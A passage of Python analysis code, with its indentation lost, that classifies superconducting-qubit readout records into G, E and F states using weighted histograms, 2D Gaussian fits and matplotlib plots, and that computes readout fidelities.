ax2.plot(time_vals,np.average(sQ_c3, axis = 0)*1000, label = 'F records')
ax2.grid()
# ax2.set_aspect(1)
ax2.legend(bbox_to_anchor=(1.05, 1.0),
loc='upper left')
ax3 = fig.add_subplot(223)
ax3.set_title("Trajectories")
ax3.set_ylabel("I Voltage (mV)")
ax3.set_xlabel("Q Voltage (mV)")
ax3.set_aspect(1)
ax3.plot(np.average(sI_c1, axis = 0)*1000, np.average(sQ_c1, axis = 0)*1000)
ax3.plot(np.average(sI_c2, axis = 0)*1000,np.average(sQ_c2, axis = 0)*1000)
ax3.plot(np.average(sI_c3, axis = 0)*1000,np.average(sQ_c3, axis = 0)*1000)
ax3.grid()
ax4 = fig.add_subplot(224)
ax4.set_title("Weight Functions")
ax4.plot(Sge_I, label = 'Wge_I')
ax4.plot(Sge_Q, label = 'Wge_Q')
ax4.plot(Sgf_I, label = 'Wgf_I')
ax4.plot(Sgf_Q, label = 'Wgf_Q')
ax4.plot(Sef_I, label = 'Wef_I')
ax4.plot(Sef_Q, label = 'Wef_Q')
ax4.legend(bbox_to_anchor=(1.05, 1.0),
loc='upper left')
ax4.grid()
fig.tight_layout(h_pad = 1, w_pad = 1.5)
fig2 = plt.figure(2, figsize = (12,8))
ax11 = fig2.add_subplot(331)
ax11.set_title("GE - G")
ax12 = fig2.add_subplot(332)
ax12.set_title("GE - E")
ax13 = fig2.add_subplot(333)
ax13.set_title("GE - F")
ax21 = fig2.add_subplot(334)
ax21.set_title("GF - G")
ax22 = fig2.add_subplot(335)
ax22.set_title("GF - E")
ax23 = fig2.add_subplot(336)
ax23.set_title("GF - F")
ax31 = fig2.add_subplot(337)
ax31.set_title("EF - G")
ax32 = fig2.add_subplot(338)
ax32.set_title("EF - E")
ax33 = fig2.add_subplot(339)
ax33.set_title("EF - F")
ax11.grid()
ax12.grid()
ax13.grid()
ax21.grid()
ax22.grid()
ax23.grid()
ax31.grid()
ax32.grid()
ax33.grid()
fig2.tight_layout(h_pad = 1, w_pad = 1)
else:
fig2 = None
ax11 = ax12 = ax13 = ax21 = ax22 = ax23 = ax31 = ax32 = ax33 = None
#using GE weights:
if hist_scale == None:
hist_scale = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale1 = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale2 = hist_scale1
hist_scale3 = hist_scale1
else:
hist_scale1 = hist_scale
hist_scale2 = hist_scale
hist_scale3 = hist_scale
# hist_scale2 = np.max(np.abs([sI_c2_avg, sQ_c2_avg]))*1.2
# hist_scale3 = np.max(np.abs([sI_c3_avg, sQ_c3_avg]))*1.2
#GE weights
bins_GE_G, h_GE_G, I_GE_G_pts, Q_GE_G_pts = weighted_histogram(Sge_I, Sge_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax11, scale = hist_scale1, record_track = record_track)
bins_GE_E, h_GE_E, I_GE_E_pts, Q_GE_E_pts = weighted_histogram(Sge_I, Sge_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax12, scale = hist_scale2, record_track = record_track)
bins_GE_F, h_GE_F, I_GE_F_pts, Q_GE_F_pts = weighted_histogram(Sge_I, Sge_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax13, scale = hist_scale3, record_track = record_track)
#
#GF weights:
bins_GF_G, h_GF_G, I_GF_G_pts, Q_GF_G_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax21, scale = hist_scale1, record_track = False)
bins_GF_E, h_GF_E, I_GF_E_pts, Q_GF_E_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax22, scale = hist_scale2, record_track = False)
bins_GF_F, h_GF_F, I_GF_F_pts, Q_GF_F_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax23, scale = hist_scale3, record_track = False)
#EF weights:
bins_EF_G, h_EF_G, I_EF_G_pts, Q_EF_G_pts = weighted_histogram(Sef_I, Sef_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax31, scale = hist_scale1, record_track = False)
bins_EF_E, h_EF_E, I_EF_E_pts, Q_EF_E_pts = weighted_histogram(Sef_I, Sef_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax32, scale = hist_scale2, record_track = False)
bins_EF_F, h_EF_F, I_EF_F_pts, Q_EF_F_pts = weighted_histogram(Sef_I, Sef_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax33, scale = hist_scale3, record_track = False)
if plot and not fit:
fig3, axs = plt.subplots(3, 1, figsize = (6,12))
viridis = cm.get_cmap('magma', 256)
newcolors = viridis(np.linspace(0, 1, 256))
gray = np.array([0.1, 0.1, 0.1, 0.1])
newcolors[128-5: 128+5] = gray
newcmp = ListedColormap(newcolors)
ax1 = axs[0]
ax2 = axs[1]
ax3 = axs[2]
ax1.set_title("Sge - inputs G and E")
ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
ax1.set_aspect(1)
ax2.set_title("Sgf - inputs G and F")
ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
ax2.set_aspect(1)
ax3.set_title("Sef - inputs E and F")
ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
ax3.set_aspect(1)
fig3.tight_layout()
if fit:
I_G = sI_c1
Q_G = sQ_c1
I_E = sI_c2
Q_E = sQ_c2
I_F = sI_c3
Q_F = sQ_c3
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
Q_F_avg = np.average(Q_F, axis = 0)
if guess:
guessParams = []
for i, [wfs, avgs] in enumerate([
[[Sge_I, Sge_Q], [I_G_avg, Q_G_avg, I_E_avg, Q_E_avg]],
[[Sgf_I, Sgf_Q], [I_G_avg, Q_G_avg, I_F_avg, Q_F_avg]],
[[Sef_I, Sef_Q], [I_E_avg, Q_E_avg, I_F_avg, Q_F_avg]],
]):
for j in range(2):
A_x0Guess = np.dot(avgs[2*j+0], wfs[0])+np.dot(avgs[2*j+1], wfs[1])
A_y0Guess = np.dot(avgs[2*j+1], wfs[0])-np.dot(avgs[2*j+0], wfs[1])
A_ampGuess = np.average([np.max(h_GE_G), np.max(h_GF_G), np.max(h_EF_F)])
A_sxGuess = hist_scale/8
# A_thetaGuess = np.average(np.angle(A_x0Guess+1j*A_y0Guess))
A_thetaGuess = 0
guessParams.append([A_ampGuess, A_y0Guess, A_x0Guess, A_sxGuess])
print(["amp", "Y0", 'X0', 'Sigma_x', 'Theta'])
print(guessParams)
print(np.shape(guessParams))
else:
guessParams = [None, None, None, None, None, None]
########
max_fev = 10000
line_ind = 0
GE_G_fit = fit_2D_Gaussian('GE_G_fit', bins_GE_G, h_GE_G,
guessParams[0],
# None,
max_fev = max_fev,
contour_line = line_ind)
GE_G_fit_h = Gaussian_2D(np.meshgrid(bins_GE_G[:-1], bins_GE_G[:-1]), *GE_G_fit.info_dict['popt'])
print(GE_G_fit.info_dict['popt'])
GE_G_fit_h_norm = np.copy(GE_G_fit_h/np.sum(GE_G_fit_h))
########
GE_E_fit = fit_2D_Gaussian('GE_E_fit', bins_GE_E, h_GE_E,
guessParams[1],
# None,
max_fev = max_fev,
contour_line = line_ind)
GE_E_fit_h = Gaussian_2D(np.meshgrid(bins_GE_E[:-1], bins_GE_E[:-1]), *GE_E_fit.info_dict['popt'])
print(GE_E_fit.info_dict['popt'])
GE_E_fit_h_norm = np.copy(GE_E_fit_h/np.sum(GE_E_fit_h))
########
GF_G_fit = fit_2D_Gaussian('GF_G_fit', bins_GF_G, h_GF_G,
guessParams[2],
# None,
max_fev = max_fev,
contour_line = line_ind)
GF_G_fit_h = Gaussian_2D(np.meshgrid(bins_GF_G[:-1], bins_GF_G[:-1]), *GF_G_fit.info_dict['popt'])
print(GF_G_fit.info_dict['popt'])
GF_G_fit_h_norm = np.copy(GF_G_fit_h/np.sum(GF_G_fit_h))
GF_F_fit = fit_2D_Gaussian('GF_F_fit', bins_GF_F, h_GF_F,
guessParams[3],
# None,
max_fev = max_fev,
contour_line = line_ind)
print(GF_F_fit.info_dict['popt'])
GF_F_fit_h = Gaussian_2D(np.meshgrid(bins_GF_F[:-1], bins_GF_F[:-1]), *GF_F_fit.info_dict['popt'])
GF_F_fit_h_norm = np.copy(GF_F_fit_h/np.sum(GF_F_fit_h))
EF_E_fit = fit_2D_Gaussian('EF_E_fit', bins_EF_E, h_EF_E,
guessParams[4],
# None,
max_fev = max_fev,
contour_line = line_ind)
print(EF_E_fit.info_dict['popt'])
EF_E_fit_h = Gaussian_2D(np.meshgrid(bins_EF_E[:-1], bins_EF_E[:-1]), *EF_E_fit.info_dict['popt'])
EF_E_fit_h_norm = np.copy(EF_E_fit_h/np.sum(EF_E_fit_h))
EF_F_fit = fit_2D_Gaussian('EF_F_fit', bins_EF_F, h_EF_F,
guessParams[5],
# None,
max_fev = max_fev,
contour_line = line_ind)
print(EF_F_fit.info_dict['popt'])
EF_F_fit_h = Gaussian_2D(np.meshgrid(bins_EF_F[:-1], bins_EF_F[:-1]), *EF_F_fit.info_dict['popt'])
EF_F_fit_h_norm = np.copy(EF_F_fit_h/np.sum(EF_F_fit_h))
GE_is_G = hist_discriminant(GE_G_fit_h, GE_E_fit_h)
GE_is_E = np.logical_not(GE_is_G)
GF_is_G = hist_discriminant(GF_G_fit_h, GF_F_fit_h)
GF_is_F = np.logical_not(GF_is_G)
EF_is_E = hist_discriminant(EF_E_fit_h, EF_F_fit_h)
EF_is_F = np.logical_not(EF_is_E)
if plot:
fig3, axs = plt.subplots(2, 3, figsize = (12,8))
viridis = cm.get_cmap('magma', 256)
newcolors = viridis(np.linspace(0, 1, 256))
gray = np.array([0.1, 0.1, 0.1, 0.1])
newcolors[128-5: 128+5] = gray
newcmp = ListedColormap(newcolors)
ax1 = axs[0,0]
ax2 = axs[0,1]
ax3 = axs[0,2]
ax1.set_title("Sge - inputs G and E")
ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
ax2.set_title("Sgf - inputs G and F")
ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
ax3.set_title("Sef - inputs E and F")
ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
#*(GE_is_G-1/2)
scale = np.max((GE_G_fit_h+GE_E_fit_h))
pc1 = axs[1,0].pcolormesh(bins_GE_G, bins_GE_G, (GE_G_fit_h+GE_E_fit_h)*(GE_is_G-1/2)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
plt.colorbar(pc1, ax = axs[1,0],fraction=0.046, pad=0.04)
GE_G_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_G_fit.sigma_contour())
GE_E_fit.plot_on_ax(axs[1,0])
axs[1,0].add_patch(GE_E_fit.sigma_contour())
scale = np.max((GF_G_fit_h+GF_F_fit_h))
pc2 = axs[1,1].pcolormesh(bins_GE_G, bins_GE_G, (GF_is_G-1/2)*(GF_G_fit_h+GF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
plt.colorbar(pc1, ax = axs[1,1],fraction=0.046, pad=0.04)
GF_G_fit.plot_on_ax(axs[1,1])
axs[1,1].add_patch(GF_G_fit.sigma_contour())
GF_F_fit.plot_on_ax(axs[1,1])
axs[1,1].add_patch(GF_F_fit.sigma_contour())
scale = np.max((EF_E_fit_h+EF_F_fit_h))
pc3 = axs[1,2].pcolormesh(bins_GE_G, bins_GE_G, (EF_is_E-1/2)*(EF_E_fit_h+EF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
plt.colorbar(pc1, ax = axs[1,2],fraction=0.046, pad=0.04)
EF_E_fit.plot_on_ax(axs[1,2])
axs[1,2].add_patch(EF_E_fit.sigma_contour())
EF_F_fit.plot_on_ax(axs[1,2])
axs[1,2].add_patch(EF_F_fit.sigma_contour())
fig3.tight_layout(h_pad = 0.1, w_pad = 1)
for ax in np.array(axs).flatten():
ax.set_aspect(1)
ax.grid()
#classify the records - done for each weight function
results = []
GE_results = []
GF_results = []
EF_results = []
all_I = np.vstack((sI_c1_classify, sI_c2_classify, sI_c3_classify))
all_Q = np.vstack((sQ_c1_classify, sQ_c2_classify, sQ_c3_classify))
# print("all_I shape: ", np.shape(all_I))
# print(np.shape(list(zip(sI_c1, sQ_c1))))
for record in list(zip(all_I, all_Q)):
It, Qt = record[0], record[1]
#GE weights
ge_I = np.dot(Sge_I, It)+np.dot(Sge_Q, Qt)
ge_Q = np.dot(Sge_I, Qt)-np.dot(Sge_Q, It)
Iloc = np.digitize(ge_I, bins_GE_G)
Qloc = np.digitize(ge_Q, bins_GE_G)
if Iloc >= 99: Iloc = 98
if Qloc >= 99: Qloc = 98
#if 1 it's G
Sge_result = GE_is_G[Iloc, Qloc]
#GF weights
gf_I = np.dot(Sgf_I, It)+np.dot(Sgf_Q, Qt)
gf_Q = np.dot(Sgf_I, Qt)-np.dot(Sgf_Q, It)
Iloc = np.digitize(gf_I, bins_GF_G)
Qloc = np.digitize(gf_Q, bins_GF_G)
if Iloc >= 99: Iloc = 98
if Qloc >= 99: Qloc = 98
#if 1 it's G
Sgf_result = GF_is_G[Iloc, Qloc]
#EF weights
ef_I = np.dot(Sef_I, It)+np.dot(Sef_Q, Qt)
ef_Q = np.dot(Sef_I, Qt)-np.dot(Sef_Q, It)
Iloc = np.digitize(ef_I, bins_EF_E)
Qloc = np.digitize(ef_Q, bins_EF_E)#edge-shifting
if Iloc >= 99: Iloc = 98
if Qloc >= 99: Qloc = 98
#if 1 it's E
Sef_result = EF_is_E[Iloc, Qloc]
# print(Sge_result)
# print(Sgf_result)
if Sge_result*Sgf_result:
result = 1 #G
elif not Sge_result and Sef_result:
result = 2 #E
elif not Sef_result and not Sgf_result:
result = 3 #F
else:
result = 4 #Null
results.append(result)
GE_results.append(Sge_result)
GF_results.append(Sgf_result)
EF_results.append(Sef_result)
results = np.array(results)
#rescale so G-> 1, E-> 2, F -> 3
GE_results = np.logical_not(np.array(GE_results))+1
GF_results = np.logical_not(np.array(GF_results))*2+1
EF_results = np.logical_not(np.array(EF_results))+2
div1 = np.shape(sI_c1_classify)[0]
numRecords = 3*div1
# print(div1)
correct_classifications = np.append(np.append(np.ones(div1), 2*np.ones(div1)), 3*np.ones(div1))
numberNull = np.sum(results[results == 4]/4)
fidelity = np.round(np.sum(correct_classifications==results)/numRecords, 3)
if plot:
fig, ax = plt.subplots(5,1, figsize = (4, 8))
viridisBig = cm.get_cmap('viridis', 512)
_cmap = ListedColormap(viridisBig(np.linspace(0, 1, 256)))
scale = Norm(vmin = 1, vmax = 4)
ax[0].set_title("Correct classifications")
ax[0].imshow([correct_classifications, correct_classifications], interpolation = 'none', cmap = _cmap, norm = scale)
ax[1].set_title("GE classifications")
ax[1].imshow([GE_results,GE_results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[2].set_title("GF classifications")
ax[2].imshow([GF_results,GF_results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[3].set_title("EF classifications")
ax[3].imshow([EF_results,EF_results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_title("Final classifications")
ax[4].get_yaxis().set_ticks([])
ax[4].set_label("Record number")
ax[4].imshow([results, results], interpolation = 'none', cmap = _cmap, norm = scale)
ax[4].set_aspect(1000)
for axi in ax:
axi.get_yaxis().set_ticks([])
axi.set_aspect(1000)
# ax[2].imshow([right, right], interpolation = 'none')
# ax[2].set_aspect(1000)
fig.tight_layout(h_pad = 1, w_pad = 1)
if debug:
print("checking sum: ", np.max(correct_classifications[2*div1:-1]==results[2*div1:-1]))
print("Number of Null results: ", numberNull)
print("Sge Imbar/sigma: ", np.linalg.norm(GE_G_fit.center_vec()-GE_E_fit.center_vec())/GE_G_fit.info_dict['sigma_x'])
print("Sgf Imbar/sigma: ", np.linalg.norm(GF_G_fit.center_vec()-GF_F_fit.center_vec())/GF_G_fit.info_dict['sigma_x'])
print("Sef Imbar/sigma: ", np.linalg.norm(EF_E_fit.center_vec()-EF_F_fit.center_vec())/EF_E_fit.info_dict['sigma_x'])
G_fidelity = np.round(np.sum(correct_classifications[0:div1]==results[0:div1])/div1, 3)
E_fidelity = np.round(np.sum(correct_classifications[div1:2*div1]==results[div1:2*div1])/div1, 3)
F_fidelity = np.round(np.sum(correct_classifications[2*div1:-1]==results[2*div1:-1])/div1, 3)
return G_fidelity, E_fidelity, F_fidelity, fidelity, numberNull
def Process_One_Acquisition_2_state(name, time_vals, sI_c1, sI_c2, sQ_c1 ,sQ_c2, hist_scale = 200, odd_only = False, even_only = False, plot = False, lpf = True, lpf_wc = 50e6, fit = False, hist_y_scale = 10, boxcar = False, bc_window = [50, 150], record_track = False, numRecordsUsed = 7860, debug = False):
sI_c1_classify = sI_c1
sI_c2_classify = sI_c2
# sI_c3_classify = sI_c3
sQ_c1_classify = sQ_c1
sQ_c2_classify = sQ_c2
# sQ_c3_classify = sQ_c3
sI_c1 = sI_c1[0:numRecordsUsed//3].copy()
sI_c2 = sI_c2[0:numRecordsUsed//3].copy()
# sI_c3 = sI_c3[0:numRecordsUsed//3].copy()
sQ_c1 = sQ_c1[0:numRecordsUsed//3].copy()
sQ_c2 = sQ_c2[0:numRecordsUsed//3].copy()
# sQ_c3 = sQ_c3[0:numRecordsUsed//3].copy()
if boxcar:
WF = np.zeros(np.size(time_vals))
WF[bc_window[0]:bc_window[1]] = 1
Sge = Sgf = Sef = WF
else:
#weight functions denoted by Sij for telling trace i from trace j
Sge_I, Sge_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c2, axis = 0)), (np.average(sQ_c1, axis = 0)-np.average(sQ_c2, axis = 0))]
# Sgf_I, Sgf_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c3, axis = 0)), (np.average(sQ_c1, axis = 0)-np.average(sQ_c3, axis = 0))]
# Sef_I, Sef_Q = [(np.average(sI_c2, axis = 0)-np.average(sI_c3, axis = 0)), (np.average(sQ_c2, axis = 0)-np.average(sQ_c3, axis = 0))]
if lpf:
Sge_I = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sge_I)
# Sgf = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sgf)
# Sef = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sef)
#nromalizing weight functions
# Sge_I /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
# Sge_Q /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
# Sef_I /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sef_Q /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sgf_I /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
# Sgf_Q /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
sI_c1_avg = np.average(sI_c1, axis = 0)
sI_c2_avg = np.average(sI_c2, axis = 0)
# sI_c3_avg = np.average(sI_c3, axis = 0)
sQ_c1_avg = np.average(sQ_c1, axis = 0)
sQ_c2_avg = np.average(sQ_c2, axis = 0)
# sQ_c3_avg = np.average(sQ_c3, axis = 0)
if plot:
fig = plt.figure(1, figsize = (12,8))
fig.suptitle(name, fontsize = 20)
ax1 = fig.add_subplot(221)
ax1.set_title("I average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax1.plot(time_vals, np.average(sI_c1, axis = 0)*1000, label = 'G_records')
ax1.plot(time_vals,np.average(sI_c2, axis = 0)*1000, label = 'E_records')
# ax1.plot(time_vals,np.average(sI_c3, axis = 0)*1000, label = 'F_records')
ax1.grid()
# ax1.set_aspect(1)
ax1.legend(loc = 'upper right')
ax2 = fig.add_subplot(222)
ax2.set_title("Q average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax2.plot(time_vals,np.average(sQ_c1, axis = 0)*1000, label = 'G records')
ax2.plot(time_vals,np.average(sQ_c2, axis = 0)*1000, label = 'E records')
# ax2.plot(time_vals,np.average(sQ_c3, axis = 0)*1000, label = 'F records')
ax2.grid()
# ax2.set_aspect(1)
ax2.legend(loc = 'upper right')
ax3 = fig.add_subplot(223)
ax3.set_title("Trajectories")
ax3.set_ylabel("I Voltage (mV)")
ax3.set_xlabel("Q Voltage (mV)")
ax3.set_aspect(1)
ax3.plot(np.average(sI_c1, axis = 0)*1000, np.average(sQ_c1, axis = 0)*1000)
ax3.plot(np.average(sI_c2, axis = 0)*1000,np.average(sQ_c2, axis = 0)*1000)
# ax3.plot(np.average(sI_c3, axis = 0)*1000,np.average(sQ_c3, axis = 0)*1000)
ax3.grid()
ax4 = fig.add_subplot(224)
ax4.set_title("Weight Functions")
ax4.plot(Sge_I, label = 'Wge_I')
ax4.plot(Sge_Q, label = 'Wge_Q')
# ax4.plot(Sgf_I, label = 'Wgf')
# ax4.plot(Sgf_Q, label = 'Wgf')
# ax4.plot(Sef_I, label = 'Wef')
# ax4.plot(Sef_Q, label = 'Wef')
ax4.legend()
ax4.grid()
fig.tight_layout(h_pad = 1, w_pad = 1.5)
fig01 = plt.figure(10, figsize = (12,8))
fig01.suptitle(name, fontsize = 20)
ax1 = fig01.add_subplot(111)
ax1.set_title("Magnitude Difference between G and E")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax1.plot(time_vals, np.sqrt(sI_c1_avg**2+sQ_c1_avg**2)*1000 - np.sqrt(sI_c2_avg**2+sQ_c2_avg**2)*1000, label = 'G_records-E_records')
ax1.grid()
fig2 = plt.figure(2, figsize = (12,8))
ax11 = fig2.add_subplot(331)
ax11.set_title("GE - G")
ax12 = fig2.add_subplot(332)
ax12.set_title("GE - E")
# ax13 = fig2.add_subplot(333)
# ax13.set_title("GE - F")
# ax21 = fig2.add_subplot(334)
# ax21.set_title("GF - G")
# ax22 = fig2.add_subplot(335)
# ax22.set_title("GF - E")
# ax23 = fig2.add_subplot(336)
# ax23.set_title("GF - F")
# ax31 = fig2.add_subplot(337)
# ax31.set_title("EF - G")
# ax32 = fig2.add_subplot(338)
# ax32.set_title("EF - E")
# ax33 = fig2.add_subplot(339)
# ax33.set_title("EF - F")
ax11.grid()
ax12.grid()
# ax13.grid()
# ax21.grid()
# ax22.grid()
# ax23.grid()
# ax31.grid()
# ax32.grid()
# ax33.grid()
fig2.tight_layout(h_pad = 1, w_pad = 1)
else:
fig2 = None
ax11 = ax12 = ax13 = ax21 = ax22 = ax23 = ax31 = ax32 = ax33 = None
#using GE weights:
if hist_scale == None:
hist_scale = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale1 = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale2 = hist_scale1
hist_scale3 = hist_scale1
else:
hist_scale1 = hist_scale
hist_scale2 = hist_scale
hist_scale3 = hist_scale
# hist_scale2 = np.max(np.abs([sI_c2_avg, sQ_c2_avg]))*1.2
# hist_scale3 = np.max(np.abs([sI_c3_avg, sQ_c3_avg]))*1.2
#GE weights
bins_GE_G, h_GE_G, I_GE_G_pts, Q_GE_G_pts = weighted_histogram(Sge_I, Sge_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax11, scale = hist_scale1, record_track = record_track)
bins_GE_E, h_GE_E, I_GE_E_pts, Q_GE_E_pts = weighted_histogram(Sge_I, Sge_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax12, scale = hist_scale2, record_track = record_track)
# bins_GE_F, h_GE_F, I_GE_F_pts, Q_GE_F_pts = weighted_histogram(Sge_I, Sge_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax13, scale = hist_scale3, record_track = record_track)
#
#GF weights:
# bins_GF_G, h_GF_G, I_GF_G_pts, Q_GF_G_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax21, scale = hist_scale1, record_track = False)
# bins_GF_E, h_GF_E, I_GF_E_pts, Q_GF_E_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax22, scale = hist_scale2, record_track = False)
# bins_GF_F, h_GF_F, I_GF_F_pts, Q_GF_F_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax23, scale = hist_scale3, record_track = False)
#EF weights:
# bins_EF_G, h_EF_G, I_EF_G_pts, Q_EF_G_pts = weighted_histogram(Sef_I, Sef_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax31, scale = hist_scale1, record_track = False)
# bins_EF_E, h_EF_E, I_EF_E_pts, Q_EF_E_pts = weighted_histogram(Sef_I, Sef_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax32, scale = hist_scale2, record_track = False)
# bins_EF_F, h_EF_F, I_EF_F_pts, Q_EF_F_pts = weighted_histogram(Sef_I, Sef_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax33, scale = hist_scale3, record_track = False)
if fit:
I_G = sI_c1
Q_G = sQ_c1
I_E = sI_c2
Q_E = sQ_c2
# I_F = sI_c3
# Q_F = sQ_c3
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
# I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
# Q_F_avg = np.average(Q_F, axis = 0)
G_x0Guess = np.max(I_G_avg)
G_x0Guess = np.dot(I_G_avg, Sge_I)+np.dot(Q_G_avg, Sge_Q)
G_y0Guess = np.max(Q_G_avg)
G_y0_Guess = np.dot(Q_G_avg, Sge_Q)-np.dot(I_G_avg, Sge_I)
G_ampGuess = np.average(np.sqrt(I_G_avg**2+Q_G_avg**2))
G_sxGuess = hist_scale/2
G_syGuess = hist_scale/2
G_thetaGuess = np.average(np.angle(I_G_avg+1j*Q_G_avg))
G_offsetGuess = 0
E_x0Guess = np.max(I_E_avg)
E_y0Guess = np.max(Q_E_avg)
E_ampGuess = np.average(np.sqrt(I_E_avg**2+Q_E_avg**2))
E_sxGuess = hist_scale/2
E_syGuess = hist_scale/2
E_thetaGuess = np.average(np.angle(I_E_avg+1j*Q_E_avg))
E_offsetGuess = 0
# F_x0Guess = np.max(I_F_avg)
# F_y0Guess = np.max(Q_F_avg)
# F_ampGuess = np.average(np.sqrt(I_F_avg**2+Q_F_avg**2))
# F_sxGuess = hist_scale/2
# F_syGuess = hist_scale/2
# F_thetaGuess = np.average(np.angle(I_F_avg+1j*Q_F_avg))
# F_offsetGuess = 0
guessParams = [[G_ampGuess, G_x0Guess, G_y0Guess, G_sxGuess, G_thetaGuess],
[E_ampGuess, E_x0Guess, E_y0Guess, E_sxGuess, E_thetaGuess],
]
if debug:
print("fitting guess parameters: ", guessParams)
########
max_fev = 10000
line_ind = 0
GE_G_fit = fit_2D_Gaussian('GE_G_fit', bins_GE_G, h_GE_G,
# guessParams[0],
None,
max_fev = max_fev,
contour_line = line_ind)
GE_G_fit_h = Gaussian_2D(np.meshgrid(bins_GE_G[:-1], bins_GE_G[:-1]), *GE_G_fit.info_dict['popt'])
GE_G_fit_h_norm = np.copy(GE_G_fit_h/np.sum(GE_G_fit_h))
########
GE_E_fit = fit_2D_Gaussian('GE_E_fit', bins_GE_E, h_GE_E,
# guessParams[1],
None,
max_fev = max_fev,
contour_line = line_ind)
GE_E_fit_h = Gaussian_2D(np.meshgrid(bins_GE_E[:-1], bins_GE_E[:-1]), *GE_E_fit.info_dict['popt'])
GE_E_fit_h_norm = np.copy(GE_E_fit_h/np.sum(GE_E_fit_h))
########
# GF_G_fit = fit_2D_Gaussian('GF_G_fit', bins_GF_G, h_GF_G,
# # guessParams[0],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# GF_G_fit_h = Gaussian_2D(np.meshgrid(bins_GF_G[:-1], bins_GF_G[:-1]), *GF_G_fit.info_dict['popt'])
# GF_G_fit_h_norm = np.copy(GF_G_fit_h/np.sum(GF_G_fit_h))
# GF_F_fit = fit_2D_Gaussian('GF_F_fit', bins_GF_F, h_GF_F,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# GF_F_fit_h = Gaussian_2D(np.meshgrid(bins_GF_F[:-1], bins_GF_F[:-1]), *GF_F_fit.info_dict['popt'])
# GF_F_fit_h_norm = np.copy(GF_F_fit_h/np.sum(GF_F_fit_h))
# EF_E_fit = fit_2D_Gaussian('EF_E_fit', bins_EF_E, h_EF_E,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# EF_E_fit_h = Gaussian_2D(np.meshgrid(bins_EF_E[:-1], bins_EF_E[:-1]), *EF_E_fit.info_dict['popt'])
# EF_E_fit_h_norm = np.copy(EF_E_fit_h/np.sum(EF_E_fit_h))
# EF_F_fit = fit_2D_Gaussian('EF_F_fit', bins_EF_F, h_EF_F,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# EF_F_fit_h = Gaussian_2D(np.meshgrid(bins_EF_F[:-1], bins_EF_F[:-1]), *EF_F_fit.info_dict['popt'])
# EF_F_fit_h_norm = np.copy(EF_F_fit_h/np.sum(EF_F_fit_h))
GE_is_G = hist_discriminant(GE_G_fit_h, GE_E_fit_h)
GE_is_E = np.logical_not(GE_is_G)
